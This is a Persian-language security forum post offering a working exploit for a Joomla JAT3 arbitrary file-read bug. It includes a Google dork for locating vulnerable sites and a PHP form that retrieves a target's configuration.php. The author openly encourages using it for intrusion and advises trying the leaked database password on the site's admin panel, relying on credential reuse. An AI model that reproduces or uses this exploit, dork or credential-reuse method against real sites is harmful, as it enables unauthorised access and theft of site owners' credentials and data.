رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

این اکسپلویت یکم قدیمی شده اما نه اینکه وجود نداره

هدف از انتشارش در گاردایران هم بخاطر این بود که اطلاع داشته باشین از این باگ و چند نکته راجع به این چنین باگ ها

هم ازش برای نفوذ استفاده کنید

دوستان این باگ باعث میشه شما به راحتی بتونید کانفیگ سایتی که به این باگ دچار هستش بخونید!

همانطور که میدونید خیلی از افراد دقت نمیکنند به این نکته و میشه گفت ۶۰٪ سایت ها یوزرنیم و پسورد دیتابیسشون

با یوزرنیم و پسورد خود سایتشون یکی هستش و شما با استفاده از این چنین باگ هایی که  توسط آنها به  نفوذگر اجازه ی

خواندن کانفیگ میدن به صفحه ی ادمین اون سایت برید و بسورد دیتابیس رو با بسورد ادمین پیج سایت مقایسه کنید و اگر یکی بودن و وارد شوید و.....

این توضیحات رو دادم نه فقط برای این باگ هر باگی که به شما این اجازه رو داد که کانفیگ رو بخونید حتما پسورد رو مقایسه کنید در ادمین بیج...

 

dork:

inurl:/index.php?jat3action

exploit:

<head>

    <title>exploit joomla jat3action</title>
    <style type="text/css">
    .auto-style1 {
        text-align: center;
    }
    </style>
    </head>
 
    <form method='POST'>
        <div class="auto-style1">
    <input name='target' type='text' value='http://victim.com' style="border: thin dotted #FF0000; width: 414px;" ><br><br />

    <?php
 
    $target = $_POST['target'];
    $exploit = '/index.php?jat3action=gzip&type=css&file=configuration.php';
    $Bug = ($target).($exploit);
    $get = @file_get_contents($Bug);
    if($get){
    echo "<textarea rows='26' cols='52' name='dns'>$get</textarea>";
    }else{
    echo "<textarea rows='26' cols='52' name='dns'>$get</textarea>";
    }
 
    ?>
    <br /><br>
            <input type='submit' value='Get The Configuration File' style="width: 179px"></div>
</form>
<div class="auto-style1">
    <br />
</div> 
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...